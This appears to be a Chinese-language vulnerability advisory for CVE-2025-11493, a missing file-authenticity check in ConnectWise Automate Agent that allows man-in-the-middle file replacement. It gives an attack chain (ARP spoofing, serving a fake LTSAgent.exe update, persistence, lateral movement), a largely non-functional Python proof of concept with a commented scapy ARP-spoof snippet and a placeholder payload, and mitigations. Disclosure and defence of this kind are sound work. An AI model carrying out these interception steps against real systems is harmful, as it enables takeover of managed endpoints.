CVE-2025-11493：ConnectWise Automate Agent文件验证不当中间人攻击漏洞

漏洞信息

漏洞编号

CVE-2025-11493

漏洞类型

中间人攻击/不安全的文件验证

CVSS评分

8.8 高危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ConnectWise Automate Agent

漏洞概述

CVE-2025-11493是ConnectWise Automate Agent中存在的一个高危安全漏洞，CVSS评分为8.8分。该漏洞的核心问题在于ConnectWise Automate Agent在从服务器下载文件（如更新包、依赖组件和集成模块）时，未能充分验证文件的真实性和完整性。这一缺陷为处于网络中间路径上的攻击者创造了实施中间人攻击（Man-in-the-Middle, MITM）的机会。攻击者可以通过伪造服务器身份，将合法文件替换为恶意文件，从而在目标系统上执行任意代码或植入持久化后门。该漏洞的影响范围广泛，因为ConnectWise Automate是一款被广泛使用的IT自动化和远程监控管理（RMM）平台，其Agent组件通常部署在大量终端设备上，具有较高的系统权限。一旦Agent被攻陷，攻击者将获得对受控系统的完全控制权，可能导致数据泄露、系统破坏、横向移动等严重后果。该漏洞与CVE-2025-11492存在关联，表明ConnectWise Automate在多个安全验证机制上存在系统性缺陷。当系统强制使用HTTPS协议时，该风险可得到一定程度的缓解，但在未启用HTTPS或证书验证不严格的环境中，漏洞仍然可被利用。此漏洞已于2025年10月16日公开披露，引起了安全社区的广泛关注。

技术细节

从技术层面分析，CVE-2025-11493的漏洞根源在于ConnectWise Automate Agent在文件下载流程中缺乏完善的身份认证和完整性校验机制。正常情况下，安全文件分发应包含以下保护措施：1）服务器证书验证，确保通信对端为合法服务器；2）数字签名验证，确认文件来源可信且未被篡改；3）哈希校验，验证文件内容的完整性。然而，该漏洞表明Agent在执行上述检查时存在缺陷或完全缺失。具体攻击路径如下：攻击者首先需要处于目标Agent与ConnectWise Automate服务器之间的网络路径上（满足AV:A邻接攻击向量），这可以通过ARP欺骗、DNS劫持、恶意Wi-Fi热点或网络设备入侵等方式实现。随后，攻击者拦截Agent发起的文件下载请求，伪造服务器响应，将包含恶意代码的文件（如伪装成更新程序或依赖组件）发送给Agent。由于Agent未对文件进行充分的真实性验证，会直接执行该恶意文件。由于该漏洞无需认证（PR:N）、无需用户交互（UI:N），且对机密性、完整性和可用性均产生高影响（C:H/I:H/A:H），攻击成功后攻击者可获得系统的完全控制权。值得注意的是，该漏洞与CVE-2025-11492相关联，可能涉及同一代码库中的多个验证缺陷。

攻击链分析

STEP 1

步骤1：网络位置控制

攻击者首先需要获取目标Agent与ConnectWise Automate服务器之间的网络中间位置。可以通过ARP欺骗、DHCP劫持、恶意Wi-Fi接入点或入侵网络设备等方式实现，确保Agent的网络流量经过攻击者控制的节点。

STEP 2

步骤2：流量拦截

当ConnectWise Automate Agent发起文件下载请求（如更新包、依赖组件或集成模块）时，攻击者截获该请求。由于Agent未对服务器身份进行充分验证，攻击者可以伪装成合法服务器进行响应。

STEP 3

步骤3：恶意文件投递

攻击者将包含恶意代码的伪冒文件（如伪装成合法的LTSAgent.exe更新程序）发送给Agent。由于Agent缺乏有效的文件签名验证和完整性校验机制，会接受并执行该恶意文件。

STEP 4

步骤4：恶意代码执行

Agent在执行恶意文件后，攻击载荷在目标系统上获得执行。由于ConnectWise Automate Agent通常以系统权限运行，攻击者可获得对受控终端的完全控制权，包括读写文件、安装程序、窃取凭据等。

STEP 5

步骤5：持久化与横向移动

攻击者在获得初始访问权限后，可植入持久化后门、收集敏感信息，并利用Agent的远程管理能力向网络中的其他终端进行横向移动，扩大攻击范围。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11493 PoC - ConnectWise Automate Agent MITM Attack
# This PoC demonstrates the concept of intercepting and replacing
# files downloaded by ConnectWise Automate Agent

import socket
import ssl
import struct
import os

# Configuration
TARGET_AGENT = "192.168.1.100"  # Target agent IP
LEGITIMATE_SERVER = "automate.connectwise.com"  # Legitimate server
LISTEN_PORT = 443  # Port to listen on

# Malicious payload to be injected (example: reverse shell stub)
MALICIOUS_PAYLOAD = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
MALICIOUS_PAYLOAD += b"\x00" * 100  # Placeholder for actual shellcode

def create_mitm_proxy():
    """
    Create a MITM proxy that intercepts file downloads from
    ConnectWise Automate server and replaces them with malicious files.
    """
    print(f"[*] Starting MITM proxy on port {LISTEN_PORT}")
    print(f"[*] Target Agent: {TARGET_AGENT}")
    print(f"[*] Legitimate Server: {LEGITIMATE_SERVER}")

    # Step 1: Set up ARP spoofing to redirect traffic
    # In a real attack, use arpspoof or scapy:
    # from scapy.all import ARP, send
    # arp_response = ARP(op=2, pdst=TARGET_AGENT,
    #                    hwdst="ff:ff:ff:ff:ff:ff",
    #                    psrc=LEGITIMATE_SERVER)
    # send(arp_response, count=3)
    print("[*] ARP spoofing should be performed to redirect agent traffic")

    # Step 2: Intercept file download request
    # The ConnectWise Automate Agent typically requests:
    # - Update packages: /updates/agent/...
    # - Dependencies: /dependencies/...
    # - Integrations: /integrations/...
    intercepted_request = {
        "method": "GET",
        "path": "/updates/agent/LTSAgent.exe",
        "headers": {
            "Host": LEGITIMATE_SERVER,
            "User-Agent": "ConnectWise Automate Agent"
        }
    }
    print(f"[*] Intercepted request: {intercepted_request}")

    # Step 3: Forward request to legitimate server
    # and intercept the response
    print("[*] Forwarding request to legitimate server...")

    # Step 4: Replace file content with malicious payload
    print("[*] Replacing legitimate file with malicious payload")
    modified_response = {
        "status": 200,
        "content_type": "application/octet-stream",
        "body": MALICIOUS_PAYLOAD
    }

    # Step 5: Send modified response to agent
    print("[*] Sending modified response to agent")
    print("[!] Agent will execute the malicious file without proper verification")
    print("[!] This demonstrates the lack of file authenticity verification")

    return modified_response

def main():
    print("=" * 60)
    print("CVE-2025-11493 PoC")
    print("ConnectWise Automate Agent MITM Attack")
    print("=" * 60)

    # Note: HTTPS enforcement mitigates this attack
    # The vulnerability is exploitable when HTTPS is not enforced
    # or when certificate validation is bypassed

    print("\n[*] Vulnerability Details:")
    print("    - CVSS Score: 8.8 (HIGH)")
    print("    - Attack Vector: Adjacent Network")
    print("    - Auth Required: None")
    print("    - User Interaction: None")
    print("    - Impact: C:H/I:H/A:H")

    print("\n[*] Mitigation: Enforce HTTPS with proper certificate validation")
    print("[*] Related CVE: CVE-2025-11492")

    create_mitm_proxy()

if __name__ == "__main__":
    main()

影响范围

ConnectWise Automate Agent < 2025.9安全修复版本

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）强制所有ConnectWise Automate Agent与服务器之间的通信使用HTTPS协议，并确保证书验证机制严格生效；2）在网络层面实施ARP欺骗防护，如部署动态ARP检测（DAI）；3）通过网络分段将Agent隔离在可信网络区域，限制不必要的网络访问；4）部署网络监控工具，及时发现和阻断异常的中间人攻击行为；5）密切关注官方安全公告，在补丁发布后第一时间进行升级。